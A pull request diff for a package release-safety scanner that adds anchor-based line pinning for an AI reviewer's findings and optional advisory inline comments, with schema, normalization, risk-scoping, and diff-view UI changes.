### PR TITLE
Let the AI reviewer pin findings and inline comments to diff lines

### DIFF
--- a/docs/release-safety.md
+++ b/docs/release-safety.md
@@ -45,6 +45,19 @@ for the lifecycle behavior behind it.
   escalates the scan to manual-review risk rather than reading as clean, and a
   near-miss submission is clamped to bounds instead of discarded. See
   [`docs/security-model.md`](security-model.md).
+- The reviewer never states a line number. It submits an `anchor` — a line copied
+  verbatim from the evidence it was served — and `server/lib/ai-review/anchors.ts`
+  resolves that string against the same text sample, requiring a unique match.
+  An anchor that misses, matches several lines, or is too generic to identify one
+  resolves to no line and the note falls back to the diff's unpinned banner. A
+  resolved line is display only: `annotateFindingsWithDiffStatus` scopes
+  `source: "ai"` findings by file, so a pinned line can never move an AI finding
+  out of the release bucket `releaseRisk` and the workflow gate read.
+- A review may also return up to `MAX_AI_COMMENTS` inline `comments`: severity-free
+  advisory notes pinned to a line, persisted in `scans.ai_json` and rendered in the
+  diff. They are context for the maintainer reading the hunk, never signals — they
+  are not `scan_findings` rows, do not count into `finding_count`, and cannot move
+  risk. A comment naming a file the review could not see is dropped.
 
 ## Operational observability
 

--- a/docs/ui.md
+++ b/docs/ui.md
@@ -52,6 +52,14 @@ move it into `src/features/` instead.
 - Use severity stacked bars for risk distribution; avoid decorative charts.
 - Icons are text glyphs only; no SVG icon libraries.
 
+## Diff annotations
+
+`DiffView` pins every annotation for a file beneath the staged line it references (`src/components/diff-annotations.ts`), and anything it cannot pin — no line, or a line past a truncated or windowed sample — falls back to a banner above the hunks so a signal is never hidden. Three kinds share that machinery:
+
+- **Deterministic findings** — captioned `<ruleId> · line N`, tinted by severity.
+- **Assistant findings** — captioned `assistant · line N` (they have no ruleId), tinted by severity like any other finding. Their line is resolved server-side from an anchor the reviewer copied out of the evidence; see [`release-safety.md`](release-safety.md).
+- **Assistant comments** — advisory notes carrying no severity, badged `assistant note` and rendered in the neutral info tone rather than a severity colour, because a note is not a signal. They are inline-only: they never appear in Risk signals, the file-tree counts, or the risk summary.
+
 ## Large diffs
 
 `DiffView` must stay responsive on megabyte-scale bundled artifacts (e.g. vite's 1.3 MiB `dist/node/chunks/node.js`):

--- a/server/lib/ai-review/anchors.ts
+++ b/server/lib/ai-review/anchors.ts
@@ -1,0 +1,84 @@
+// Turns a reviewer-supplied anchor — a line it copied verbatim out of the
+// evidence it was shown — into a line number in the same text sample the
+// evidence tools served.
+//
+// The model never states a line number. It cannot: `read` returns diff and file
+// text with no numbering, so any number it produced would be counted from
+// memory, and a mis-pinned finding is worse than an unpinned one (it points a
+// maintainer at innocent code and quietly exonerates the guilty line). Matching
+// a string it must have actually seen is the only claim we can check, so that is
+// the only claim we accept.
+//
+// Every path out of here is fail-closed: an anchor that does not match, matches
+// ambiguously, or is too generic to identify a line resolves to `null`, and the
+// note falls back to the unpinned banner the diff already renders above the
+// hunks.
+
+// Below this many non-whitespace characters an anchor carries no identity —
+// `}`, `});`, `"` and friends match dozens of lines in any real file, and the
+// first of them is no likelier to be the intended one than any other.
+const MIN_ANCHOR_SIGNAL_CHARS = 4;
+
+/**
+ * Resolve `anchor` to a 1-based line number in `text`, or null when it cannot
+ * be pinned unambiguously.
+ *
+ * Two passes over the whole file, each requiring a unique match: line equality
+ * first (what a correctly copied anchor hits), then line-contains-anchor (what
+ * an anchor clipped by the length bound hits). Comparison is on trimmed lines,
+ * because the reviewer reads text that has already been through diff rendering
+ * and per-call truncation, so leading indentation is not reliably preserved.
+ *
+ * Each pass tries the anchor as given and, when it starts with a unified-diff
+ * marker, the marker-stripped form: `read` serves changed files as `+`/`-`/space
+ * prefixed diff text, so a faithfully copied anchor can carry a prefix that
+ * appears nowhere in the file — while a line of source that genuinely begins
+ * with `-` (a shell flag, a YAML list item) must still match itself. Trying the
+ * literal form first keeps the genuine case exact and treats marker-stripping as
+ * the fallback it is.
+ */
+export function resolveAnchorLine(
+  text: string | null | undefined,
+  anchor: string | null | undefined,
+): number | null {
+  const candidates = anchorCandidates(anchor);
+  if (!candidates.length || !text) return null;
+
+  const lines = text.split("\n").map((line) => line.trim());
+  for (const candidate of candidates) {
+    const exact = matchUniqueLine(lines, (line) => line === candidate);
+    if (exact !== null) return exact;
+  }
+  for (const candidate of candidates) {
+    const partial = matchUniqueLine(lines, (line) => line.includes(candidate));
+    if (partial !== null) return partial;
+  }
+  return null;
+}
+
+/**
+ * The forms of `anchor` worth searching for, most literal first, with anchors
+ * too generic to identify a line rejected outright. Exported for tests.
+ */
+export function anchorCandidates(anchor: string | null | undefined): string[] {
+  if (typeof anchor !== "string") return [];
+  const trimmed = anchor.trim();
+  const stripped = /^[+-]/.test(trimmed) ? trimmed.slice(1).trim() : "";
+  return [trimmed, stripped].filter(
+    (candidate, index, all) =>
+      candidate.replace(/\s+/g, "").length >= MIN_ANCHOR_SIGNAL_CHARS &&
+      all.indexOf(candidate) === index,
+  );
+}
+
+// A match is usable only when exactly one line satisfies the predicate.
+// Multiple matches mean the anchor identifies a shape, not a place.
+function matchUniqueLine(lines: string[], predicate: (line: string) => boolean): number | null {
+  let found: number | null = null;
+  for (let index = 0; index < lines.length; index += 1) {
+    if (!predicate(lines[index])) continue;
+    if (found !== null) return null;
+    found = index + 1;
+  }
+  return found;
+}

--- a/server/lib/ai-review/contract.ts
+++ b/server/lib/ai-review/contract.ts
@@ -6,6 +6,11 @@ export type AiReviewEcosystem = "npm" | "pypi" | "vscode" | "generic";
 // first, capped at this count. Lower-severity context belongs in the summary.
 export const MAX_AI_FINDINGS = 6;
 
+// Advisory line-pinned notes the reviewer may leave on the diff. Capped low on
+// purpose: comments are for the handful of lines where a note beats reading the
+// hunk cold, and every one of them costs output tokens on every review.
+export const MAX_AI_COMMENTS = 6;
+
 const BASE_REVIEWER_SYSTEM_PROMPT = `Staged package release safety reviewer.
 
 Instruction boundary:
@@ -93,6 +98,18 @@ Findings output:
 - Report only critical/high findings, most severe first, at most ${MAX_AI_FINDINGS}. The system keeps the top ${MAX_AI_FINDINGS} critical/high and discards the rest.
 - Put medium/low/info observations in the summary. Set requiresManualReview and overall risk/releaseAssessment to reflect concern below a critical/high finding.
 
+Anchors (how a note gets pinned to a line):
+- \`anchor\` is one line copied verbatim from the file, exactly as the tool returned it, minus the leading diff marker (+, -, or space). No paraphrase, no elision, no reconstruction, no concatenating two lines.
+- Never state a line number anywhere. The system finds the line by matching your anchor against the file; an anchor it cannot match unambiguously is simply not pinned, which costs nothing.
+- Prefer an anchor with distinctive content. A bare \`}\` or a blank line matches everywhere and pins nothing.
+- Give every finding an anchor when the evidence is one line of a text file. Omit it for whole-file, manifest-wide, missing-file, or binary evidence.
+
+Inline comments (\`comments\`, optional, at most ${MAX_AI_COMMENTS}):
+- Short notes pinned next to a line of the diff for the maintainer reading that file: what a changed hunk actually does, why an alarming-looking construct is ordinary here, or what a reader should verify themselves.
+- Each needs \`file\`, \`anchor\` (as above), and \`note\` — one or two sentences of plain prose, no markdown.
+- Advisory only. They never change risk and never stand in for a finding: critical/high concern belongs in \`findings\`, everything else that changes the verdict belongs in \`summary\`.
+- Comment only where the note adds something the diff does not already say. Zero comments is a fine answer for an ordinary release; never narrate routine edits line by line.
+
 Summary style:
 - Plain prose only — no markdown, bullets, or headings; the UI renders the summary as plain text.
 - nothing_unusual: 1-3 sentences naming the kinds of changes and confirming no install-time, entrypoint, dependency, network/process, credential, or obfuscation capability was found. Never inventory routine changes file-by-file.
@@ -117,11 +134,12 @@ export function buildReviewerSystemPrompt(ecosystem: string | undefined): string
 
 export const MAX_AGENT_STEPS = 20;
 // Per-step output-token cap, sized comfortably above a worst-case submission so
-// findings plus summary serialize without truncation. A slight overshoot is
+// findings, anchors, inline comments, and summary serialize without truncation.
+// (Raised from 8k when anchors and comments were added to the schema.) A slight overshoot is
 // clamped by clampAiReviewSubmission; only a submission truncated mid-JSON by
 // this cap is unrecoverable, and that degrades to `invalid` which the risk layer
 // escalates to manual review.
-export const MAX_REVIEW_OUTPUT_TOKENS = 8_000;
+export const MAX_REVIEW_OUTPUT_TOKENS = 10_000;
 export const MAX_CHANGED_FILE_MANIFEST = 300;
 export const MAX_TOOL_RESPONSE_CHARS = 16_000;
 export const MAX_TOTAL_TOOL_RESPONSE_CHARS = 48_000;
@@ -154,8 +172,23 @@ const AI_REVIEW_BOUNDS = {
   evidence: 600,
   reason: 600,
   recommendation: 400,
+  anchor: 240,
+  note: 320,
   findingsCount: 12,
+  commentsCount: 10,
 } as const;
+
+// A verbatim source line the reviewer copied out of the evidence it was shown.
+// Never persisted and never rendered: `resolveAnchorLine` turns it into a line
+// number against the same text sample the tools served, and anything that does
+// not match exactly is dropped. That is what makes pinning safe — the model
+// supplies a string to search for, never a coordinate we have to trust.
+const anchorSchema = z
+  .string()
+  .max(AI_REVIEW_BOUNDS.anchor)
+  .describe(
+    "One line copied verbatim from the file, without its leading diff marker. Omit when the evidence is not a single line.",
+  );
 
 const aiFindingSchema = z
   .object({
@@ -164,6 +197,19 @@ const aiFindingSchema = z
     evidence: z.string().min(1).max(AI_REVIEW_BOUNDS.evidence),
     reason: z.string().min(1).max(AI_REVIEW_BOUNDS.reason),
     recommendation: z.string().min(1).max(AI_REVIEW_BOUNDS.recommendation),
+    anchor: anchorSchema.optional(),
+  })
+  .strict();
+
+const aiCommentSchema = z
+  .object({
+    file: z.string().min(1).max(AI_REVIEW_BOUNDS.file),
+    anchor: anchorSchema,
+    note: z
+      .string()
+      .min(1)
+      .max(AI_REVIEW_BOUNDS.note)
+      .describe("One or two sentences of plain prose. No markdown."),
   })
   .strict();
 
@@ -185,6 +231,11 @@ export const aiReviewSubmissionSchema = z
     // critical/high findings via selectReportedFindings. This cap only keeps a
     // runaway submission inside the output-token budget.
     findings: z.array(aiFindingSchema).max(AI_REVIEW_BOUNDS.findingsCount),
+    // Advisory line-pinned notes. Optional so a model that ignores the field
+    // still submits a valid review, and capped above MAX_AI_COMMENTS for the
+    // same reason `findingsCount` is: the trim happens in normalization, this
+    // bound only keeps a runaway submission inside the output-token budget.
+    comments: z.array(aiCommentSchema).max(AI_REVIEW_BOUNDS.commentsCount).optional(),
     requiresManualReview: z.boolean(),
   })
   .strict();
@@ -205,6 +256,16 @@ export function clampAiReviewSubmission(raw: unknown): unknown {
     findings: Array.isArray(value.findings)
       ? value.findings.slice(0, AI_REVIEW_BOUNDS.findingsCount).map(clampFinding)
       : value.findings,
+    // `comments` is optional: an absent key stays absent, and a non-array is
+    // passed through untouched so validation still rejects it (repairing only
+    // ever clamps sizes, it never invents shape).
+    ...(Array.isArray(value.comments)
+      ? {
+          comments: value.comments.slice(0, AI_REVIEW_BOUNDS.commentsCount).map(clampComment),
+        }
+      : value.comments === undefined
+        ? {}
+        : { comments: value.comments }),
   };
 }
 
@@ -217,6 +278,21 @@ function clampFinding(raw: unknown): unknown {
     evidence: clampString(value.evidence, AI_REVIEW_BOUNDS.evidence),
     reason: clampString(value.reason, AI_REVIEW_BOUNDS.reason),
     recommendation: clampString(value.recommendation, AI_REVIEW_BOUNDS.recommendation),
+    // Truncating an anchor is safe: a clipped line either still matches a
+    // unique line or matches nothing and goes unpinned.
+    ...(value.anchor === undefined
+      ? {}
+      : { anchor: clampString(value.anchor, AI_REVIEW_BOUNDS.anchor) }),
+  };
+}
+
+function clampComment(raw: unknown): unknown {
+  if (!raw || typeof raw !== "object" || Array.isArray(raw)) return raw;
+  const value = raw as Record<string, unknown>;
+  return {
+    file: clampString(value.file, AI_REVIEW_BOUNDS.file),
+    anchor: clampString(value.anchor, AI_REVIEW_BOUNDS.anchor),
+    note: clampString(value.note, AI_REVIEW_BOUNDS.note),
   };
 }
 
@@ -226,6 +302,7 @@ function clampString(value: unknown, max: number): unknown {
 
 export type AiReviewSubmission = z.infer<typeof aiReviewSubmissionSchema>;
 export type AiReviewSubmissionFinding = z.infer<typeof aiFindingSchema>;
+export type AiReviewSubmissionComment = z.infer<typeof aiCommentSchema>;
 
 const SEVERITY_RANK: Record<AiReviewSubmissionFinding["severity"], number> = {
   critical: 0,
@@ -247,6 +324,14 @@ export function selectReportedFindings(
     .slice(0, MAX_AI_FINDINGS);
 }
 
+// Comments have no severity to rank by (they are notes, not signals), so the
+// trim keeps submission order and caps the count.
+export function selectReportedComments(
+  comments: AiReviewSubmissionComment[] | undefined,
+): AiReviewSubmissionComment[] {
+  return (comments ?? []).slice(0, MAX_AI_COMMENTS);
+}
+
 // Validation schema for a *persisted* AiReview (as stored in `scans.ai_json`),
 // as opposed to `aiReviewSubmissionSchema` which validates the model's raw
 // tool call. This one carries the reviewer envelope the pipeline adds after
@@ -259,6 +344,16 @@ const persistedAiFindingSchema = z.object({
   evidence: z.string(),
   reason: z.string(),
   recommendation: z.string(),
+  // Resolved from the submission's anchor at normalization time (never taken
+  // from the model as a number). Absent on every review persisted before
+  // anchors existed, so it stays optional rather than nullable-required.
+  line: z.number().int().positive().nullable().optional(),
+});
+
+const persistedAiCommentSchema = z.object({
+  file: z.string(),
+  note: z.string(),
+  line: z.number().int().positive().nullable().optional(),
 });
 
 const persistedAiReviewSchema = z.object({
@@ -273,6 +368,9 @@ const persistedAiReviewSchema = z.object({
   ]),
   summary: z.string(),
   findings: z.array(persistedAiFindingSchema),
+  // Older records predate inline comments; default rather than reject so a
+  // historical review still parses into the current shape.
+  comments: z.array(persistedAiCommentSchema).default([]),
   requiresManualReview: z.boolean(),
   model: z.string().nullable(),
 });

--- a/server/lib/ai-review/evidence.ts
+++ b/server/lib/ai-review/evidence.ts
@@ -16,6 +16,7 @@ import {
   listFilesInputSchema,
   type AiReviewSubmission,
 } from "./contract";
+import { resolveAnchorLine } from "./anchors";
 import type { DiffEntry, FileRecord } from "../review";
 import { nativeFormatLabel } from "../review/rules/binaries";
 import type { SelectiveAiReviewOptions } from "./types";
@@ -290,6 +291,41 @@ export function createAiReviewTools(
     }),
   };
 }
+
+export interface ResolvedAnchor {
+  /** The package-relative path as the diff and the file tree spell it. */
+  file: string;
+  /** 1-based line in the staged text, or null when the anchor did not pin. */
+  line: number | null;
+}
+
+/**
+ * Resolve a submitted `(file, anchor)` pair against the exact evidence the model
+ * was served, so a note can be pinned to a diff line.
+ *
+ * Returns null when the path is not one this review could see at all — that is a
+ * fabricated citation, not a near miss. A real path with an unusable anchor
+ * still resolves, with `line: null`, because the note itself is worth keeping.
+ *
+ * Staged text wins over previous text: the workbench numbers lines on the staged
+ * side, so a line resolved against the baseline would pin to the wrong row on
+ * every modified file.
+ */
+export function createAnchorResolver(index: EvidenceIndex) {
+  return (rawFile: string, anchor?: string | null): ResolvedAnchor | null => {
+    const file = resolveKnownPath(
+      rawFile,
+      index.stagedByPath,
+      index.previousByPath,
+      index.diffByPath,
+    );
+    if (!file) return null;
+    const record = index.stagedByPath.get(file) ?? index.previousByPath.get(file);
+    return { file, line: resolveAnchorLine(record?.textSample, anchor) };
+  };
+}
+
+export type AnchorResolver = ReturnType<typeof createAnchorResolver>;
 
 export function buildEvidenceIndex(options: SelectiveAiReviewOptions): EvidenceIndex {
   const stagedByPath = new Map(options.files.map((file) => [file.path, file]));

--- a/server/lib/ai-review/index.ts
+++ b/server/lib/ai-review/index.ts
@@ -7,10 +7,17 @@ import {
   MAX_AGENT_STEPS,
   MAX_LOW_SIGNAL_CHANGED_FILES,
   MAX_REVIEW_OUTPUT_TOKENS,
+  selectReportedComments,
   selectReportedFindings,
   type AiReviewSubmission,
 } from "./contract";
-import { buildAiReviewPayload, buildEvidenceIndex, createAiReviewTools } from "./evidence";
+import {
+  buildAiReviewPayload,
+  buildEvidenceIndex,
+  createAiReviewTools,
+  createAnchorResolver,
+  type AnchorResolver,
+} from "./evidence";
 import type {
   AiReview,
   AiReviewResult,
@@ -79,6 +86,9 @@ export async function analyzeWithAi(
   const models = typeof model === "string" ? [model] : [...model];
   const index = buildEvidenceIndex(options);
   const payload = buildAiReviewPayload(options, index);
+  // Built from the same index the tools read, so an anchor is matched against
+  // exactly the bytes the model was shown.
+  const anchors = createAnchorResolver(index);
   const transientFailures: string[] = [];
 
   for (const candidateModel of models) {
@@ -150,10 +160,10 @@ export async function analyzeWithAi(
         const usage = toUsage(result.totalUsage, result.steps.length);
 
         if (submittedReview) {
-          return { review: normalizeParsedReview(candidateModel, submittedReview), usage };
+          return { review: normalizeParsedReview(candidateModel, submittedReview, anchors), usage };
         }
 
-        const textReview = normalizeAiResponse(candidateModel, result.text);
+        const textReview = normalizeAiResponse(candidateModel, result.text, anchors);
         if (textReview.status === "complete") {
           return { review: textReview, usage };
         }
@@ -277,9 +287,9 @@ function scanScopedCacheAffinity(env: Cloudflare.Env, scanId: string | undefined
   return `${base}:${suffix}`;
 }
 
-function normalizeAiResponse(model: string, text: string): AiReview {
+function normalizeAiResponse(model: string, text: string, anchors: AnchorResolver): AiReview {
   try {
-    return normalizeParsedReview(model, JSON.parse(text));
+    return normalizeParsedReview(model, JSON.parse(text), anchors);
   } catch {
     return fallbackReview(
       model,
@@ -289,7 +299,7 @@ function normalizeAiResponse(model: string, text: string): AiReview {
   }
 }
 
-function normalizeParsedReview(model: string, value: unknown): AiReview {
+function normalizeParsedReview(model: string, value: unknown, anchors: AnchorResolver): AiReview {
   const parsed = aiReviewSubmissionSchema.safeParse(value);
   if (!parsed.success) {
     return fallbackReview(
@@ -307,7 +317,22 @@ function normalizeParsedReview(model: string, value: unknown): AiReview {
     risk: review.risk,
     releaseAssessment: review.releaseAssessment,
     summary: review.summary,
-    findings: selectReportedFindings(review.findings),
+    findings: selectReportedFindings(review.findings).map((finding) => {
+      // `anchor` is a lookup key, not report content: it is consumed here and
+      // never persisted. A path the review could not have seen keeps the
+      // finding (its evidence still stands on its own) but wins no line.
+      const { anchor, ...rest } = finding;
+      const resolved = anchors(finding.file, anchor);
+      return { ...rest, file: resolved?.file ?? finding.file, line: resolved?.line ?? null };
+    }),
+    // A comment is only meaningful next to the line it annotates, so unlike a
+    // finding it is dropped outright when its file is not one this review could
+    // see. An unpinned comment on a real file is kept: the diff surfaces it in
+    // the same banner it uses for unpinnable findings.
+    comments: selectReportedComments(review.comments).flatMap((comment) => {
+      const resolved = anchors(comment.file, comment.anchor);
+      return resolved ? [{ file: resolved.file, note: comment.note, line: resolved.line }] : [];
+    }),
     requiresManualReview: review.requiresManualReview,
     model,
   };
@@ -324,6 +349,7 @@ function fallbackReview(
     releaseAssessment: "not_assessed",
     summary,
     findings: [],
+    comments: [],
     requiresManualReview: false,
     model,
   };

--- a/server/lib/ai-review/types.ts
+++ b/server/lib/ai-review/types.ts
@@ -25,7 +25,7 @@ interface AiFinding {
  * counts toward `finding_count`. Anything that should move the verdict has to be
  * a finding or the summary.
  */
-export interface AiReviewComment {
+interface AiReviewComment {
   file: string;
   note: string;
   line?: number | null;

--- a/server/lib/ai-review/types.ts
+++ b/server/lib/ai-review/types.ts
@@ -7,6 +7,28 @@ interface AiFinding {
   evidence: string;
   reason: string;
   recommendation: string;
+  /**
+   * Staged line the finding pins to in the diff, resolved from the submitted
+   * anchor by `resolveAnchorLine` — never a number the model supplied. Null when
+   * the anchor was absent or did not match a single line, which is how the
+   * finding falls back to the unpinned banner above the hunks.
+   */
+  line?: number | null;
+}
+
+/**
+ * An advisory note the reviewer pinned to one line of the diff.
+ *
+ * Deliberately severity-free and deliberately outside the findings pipeline: a
+ * comment is context for the maintainer reading the hunk, not a signal. It never
+ * persists as a `scan_findings` row, never enters `computeScanRisk`, and never
+ * counts toward `finding_count`. Anything that should move the verdict has to be
+ * a finding or the summary.
+ */
+export interface AiReviewComment {
+  file: string;
+  note: string;
+  line?: number | null;
 }
 
 export type AiReviewStatus = "complete" | "invalid" | "unavailable";
@@ -19,6 +41,7 @@ export interface AiReview {
   releaseAssessment: AiReleaseAssessment | "not_assessed";
   summary: string;
   findings: AiFinding[];
+  comments: AiReviewComment[];
   requiresManualReview: boolean;
   model: string | null;
 }
@@ -60,6 +83,7 @@ export type DisplayedAiResult =
       risk: RiskLevel;
       releaseAssessment: AiReleaseAssessment;
       findings: AiFinding[];
+      comments: AiReviewComment[];
       requiresManualReview: boolean;
     }
   | {
@@ -84,6 +108,8 @@ export function displayedAiResult(review: AiReview | null | undefined): Displaye
       risk: review.risk,
       releaseAssessment: review.releaseAssessment,
       findings: review.findings,
+      // Historical records (and hand-built fixtures) predate the field.
+      comments: review.comments ?? [],
       requiresManualReview: review.requiresManualReview,
     };
   }

--- a/server/lib/public-diff/index.ts
+++ b/server/lib/public-diff/index.ts
@@ -96,6 +96,7 @@ const AI_REVIEW_DISABLED: AiReview = {
   releaseAssessment: "not_assessed",
   summary: "AI review is disabled.",
   findings: [],
+  comments: [],
   requiresManualReview: false,
   model: null,
 };

--- a/server/lib/review/diff-annotation.ts
+++ b/server/lib/review/diff-annotation.ts
@@ -26,6 +26,10 @@ export function annotateFindingsWithDiffStatus<
     line?: number | null;
     ruleId?: string | null;
     severity?: string | null;
+    // "ai" marks an assistant finding, whose `line` is an anchor-resolved
+    // display coordinate rather than rule-matched evidence. See
+    // `isFindingOnReleaseDelta`.
+    source?: string | null;
   },
 >(
   findings: T[],
@@ -123,7 +127,7 @@ function parsePackageJsonFile(
 }
 
 function isFindingOnReleaseDelta(
-  finding: { file: string; line?: number | null; ruleId?: string | null },
+  finding: { file: string; line?: number | null; ruleId?: string | null; source?: string | null },
   diffStatus: FindingDiffStatus,
   previousByPath: Map<string, Pick<FileRecord, "path" | "textSample" | "flags">>,
   stagedByPath: Map<string, Pick<FileRecord, "path" | "textSample" | "flags">>,
@@ -133,12 +137,21 @@ function isFindingOnReleaseDelta(
 ): boolean {
   if (diffStatus === "added") return true;
   if (diffStatus !== "modified") return false;
+  // An AI finding carries an anchor-resolved line for display only: the reviewer
+  // pins a concern to the clearest line illustrating it, which for a whole-file
+  // or manifest-wide argument is often a line the release never touched. Reading
+  // that coordinate as line-level evidence would move the finding out of the
+  // release bucket the workflow gate scores — a display feature quietly lowering
+  // `releaseRisk`. AI findings therefore stay scoped by file, exactly as they
+  // were before anchors existed. Deterministic lines come from the rule that
+  // matched, so they keep scoping.
+  const line = finding.source === "ai" ? null : finding.line;
   // When line-level evidence is unavailable (no recorded line, binary file, or
   // missing text samples), fall back to the baseline finding set: if the same
   // rule already fired on the same file in the baseline version, the capability
   // pre-existed the release and reads as package context. Without a baseline
   // counterpart the classification still fails open to release delta.
-  if (!finding.line) return !baselineHasFinding(baselineFingerprints, finding);
+  if (!line) return !baselineHasFinding(baselineFingerprints, finding);
 
   const changedLines = changedStagedLinesForPath(
     finding.file,
@@ -147,7 +160,7 @@ function isFindingOnReleaseDelta(
     changedLineCache,
   );
   if (!changedLines) return !baselineHasFinding(baselineFingerprints, finding);
-  if (changedLines.has(finding.line)) return true;
+  if (changedLines.has(line)) return true;
   return findingPatternMatchesChangedLine(
     finding,
     stagedByPath.get(finding.file)?.textSample,

--- a/server/lib/scan/artifacts.ts
+++ b/server/lib/scan/artifacts.ts
@@ -823,7 +823,10 @@ function parseReportFindingsObject(
       file: finding.file,
       evidence: finding.evidence,
       reason: finding.reason,
-      line: null,
+      // Anchor-resolved staged line, when the review recorded one. Reading it
+      // back here is what keeps this path byte-identical to the D1 rows
+      // mergeAiFindings writes for the same review.
+      line: typeof finding.line === "number" ? finding.line : null,
       source: "ai",
       ruleId: null,
       ruleVersion: null,
@@ -864,6 +867,11 @@ export function projectAiReviewFindings(review: AiReview | null | undefined): Fi
       file: finding.file,
       evidence: finding.evidence,
       reason: finding.reason,
+      // Anchor-resolved staged line (see resolveAnchorLine); persisted so the
+      // workbench pins an AI finding to its hunk the same way it pins a
+      // deterministic one. `undefined` when the anchor did not resolve, which
+      // is what `scan_findings.line` stores as NULL.
+      ...(typeof finding.line === "number" ? { line: finding.line } : {}),
     })),
   );
 }

--- a/server/lib/scan/pipeline-phases.ts
+++ b/server/lib/scan/pipeline-phases.ts
@@ -196,12 +196,20 @@ export function mergeAiFindings(
   // hold byte-identical rows; it returns [] for a review that did not complete.
   const records = projectAiReviewFindings(aiReview);
   if (records.length === 0) return { records: [], annotatedRecords: [] };
-  const annotatedRecords = annotateFindingsWithDiffStatus(records, diff.fileDiff, {
-    previousFiles: findings.redactedPreviousFiles,
-    stagedFiles: findings.redactedStagedFiles,
-    codePatternSet,
-    baselineComparisonSkipped,
-  });
+  // Annotated as `source: "ai"` — the same marker the persisted rows carry — so
+  // the annotator scopes these by file rather than by their anchor-resolved
+  // line. Without it a whole-file concern pinned to an untouched line would fall
+  // out of the release bucket `releaseRisk` and the workflow gate read.
+  const annotatedRecords = annotateFindingsWithDiffStatus(
+    records.map((record) => ({ ...record, source: "ai" as const })),
+    diff.fileDiff,
+    {
+      previousFiles: findings.redactedPreviousFiles,
+      stagedFiles: findings.redactedStagedFiles,
+      codePatternSet,
+      baselineComparisonSkipped,
+    },
+  );
   return { records, annotatedRecords };
 }
 

--- a/server/lib/scan/pipeline.ts
+++ b/server/lib/scan/pipeline.ts
@@ -243,6 +243,7 @@ async function maybeRunAiReview(args: AiReviewArgs): Promise<AiReview> {
     releaseAssessment: "not_assessed",
     summary: "AI review is disabled.",
     findings: [],
+    comments: [],
     requiresManualReview: false,
     model: null,
   };
@@ -331,6 +332,7 @@ async function maybeRunAiReview(args: AiReviewArgs): Promise<AiReview> {
       releaseAssessment: "not_assessed",
       summary: "AI review failed; deterministic findings remain available.",
       findings: [],
+      comments: [],
       requiresManualReview: false,
       model: AI_MODEL,
     };

--- a/server/lib/scan/report-export.ts
+++ b/server/lib/scan/report-export.ts
@@ -222,9 +222,15 @@ function extractAiReview(aiJson: unknown) {
       findings: displayed.findings.map((finding) => ({
         severity: finding.severity,
         file: finding.file,
+        line: finding.line ?? null,
         evidence: finding.evidence,
         reason: finding.reason,
         recommendation: finding.recommendation,
+      })),
+      comments: displayed.comments.map((comment) => ({
+        file: comment.file,
+        line: comment.line ?? null,
+        note: comment.note,
       })),
     };
   }
@@ -236,6 +242,7 @@ function extractAiReview(aiJson: unknown) {
     releaseAssessment: null,
     requiresManualReview: false,
     findings: [],
+    comments: [],
   };
 }
 

--- a/src/components/DiffView.tsx
+++ b/src/components/DiffView.tsx
@@ -39,9 +39,10 @@ export interface DiffViewProps {
   after: DiffSide | null;
   beforeLabel: string;
   afterLabel: string;
-  // Deterministic findings for this file, pinned to the staged line they
-  // reference. Findings without a matching line surface in a banner above the
-  // diff so a truncated sample can't hide a signal.
+  // Annotations for this file — deterministic findings, assistant findings, and
+  // assistant comments alike — pinned to the staged line they reference.
+  // Anything without a matching line surfaces in a banner above the diff so a
+  // truncated sample can't hide a signal.
   findings?: DiffFinding[];
 }
 
@@ -1287,8 +1288,14 @@ const ANNOTATION_BAR: Record<SeverityGroup, string> = {
 // The body of a pinned finding: severity Badge + mono `ruleId · line N` caption,
 // the reason, and (when present) the triggering evidence in mono. Mirrors the
 // landing page's review-preview annotation so what we advertise matches the app.
+//
+// An assistant comment reuses the same callout with two differences: a neutral
+// "assistant note" badge instead of a severity one, and the info group's quiet
+// blue fill. Both are deliberate — a note is not a signal, and giving it a
+// severity colour would spend the diff's loudest affordance on prose.
 function FindingAnnotationBody({ finding }: { finding: DiffFinding }) {
-  const group = severityGroup(finding.severity);
+  const isComment = finding.kind === "comment";
+  const group = isComment ? "info" : severityGroup(finding.severity);
   const label = annotationLabel(finding);
   return (
     <div
@@ -1302,7 +1309,11 @@ function FindingAnnotationBody({ finding }: { finding: DiffFinding }) {
       )}
     >
       <div class="flex flex-wrap items-center gap-2">
-        <Badge tone={severityTone(finding.severity)}>{finding.severity}</Badge>
+        {isComment ? (
+          <Badge tone="neutral">assistant note</Badge>
+        ) : (
+          <Badge tone={severityTone(finding.severity)}>{finding.severity}</Badge>
+        )}
         {label ? (
           <span class="font-mono text-[10px] uppercase tracking-[0.1em] text-ink-subtle">
             {label}

--- a/src/components/diff-annotations.ts
+++ b/src/components/diff-annotations.ts
@@ -10,6 +10,14 @@ export interface DiffFinding {
   ruleId?: string | null;
   reason: string;
   evidence?: string | null;
+  // Who produced this: "rule" for a deterministic rule, "ai" for the assistant.
+  // Drives the caption only — an AI finding is pinned, styled, and ranked by the
+  // same severity machinery as a deterministic one.
+  source?: string | null;
+  // "comment" marks an advisory assistant note rather than a finding. Notes
+  // carry no severity of their own (they render in the neutral info group) and
+  // never appear in the risk-signals index or the file-tree counts.
+  kind?: "finding" | "comment";
 }
 
 export type SeverityGroup = "danger" | "warn" | "info" | "ok";
@@ -44,9 +52,16 @@ export function maxSeverity(a: string | null, b: string | null): string | null {
 
 // The mono caption above a pinned finding: `ruleId · line N`. Either part may be
 // absent; returns null when neither is present so the caption can be skipped.
-export function annotationLabel(finding: Pick<DiffFinding, "ruleId" | "line">): string | null {
+// An assistant finding has no ruleId, so it is captioned by its origin instead —
+// otherwise it reads as an unattributed claim sitting on the same line as
+// deterministic evidence, which is exactly the distinction a maintainer weighs.
+export function annotationLabel(
+  finding: Pick<DiffFinding, "ruleId" | "line" | "source" | "kind">,
+): string | null {
   const parts: string[] = [];
+  // A comment's origin is already on its badge, so it takes the line alone.
   if (finding.ruleId) parts.push(finding.ruleId);
+  else if (finding.source === "ai" && finding.kind !== "comment") parts.push("assistant");
   if (typeof finding.line === "number") parts.push(`line ${finding.line}`);
   return parts.length ? parts.join(" · ") : null;
 }

--- a/src/pages/Dashboard/ScanDetail/index.tsx
+++ b/src/pages/Dashboard/ScanDetail/index.tsx
@@ -26,6 +26,7 @@ import { createPackageDiff, type DiffEntry } from "../../../../server/lib/review
 import { Alert } from "../../../components/Alert";
 import { Button } from "../../../components/Button";
 import { Card } from "../../../components/Card";
+import type { DiffFinding } from "../../../components/DiffView";
 import { FileTree } from "../../../components/FileTree";
 import { Input } from "../../../components/Input";
 import { LoadingState } from "../../../components/Loading";
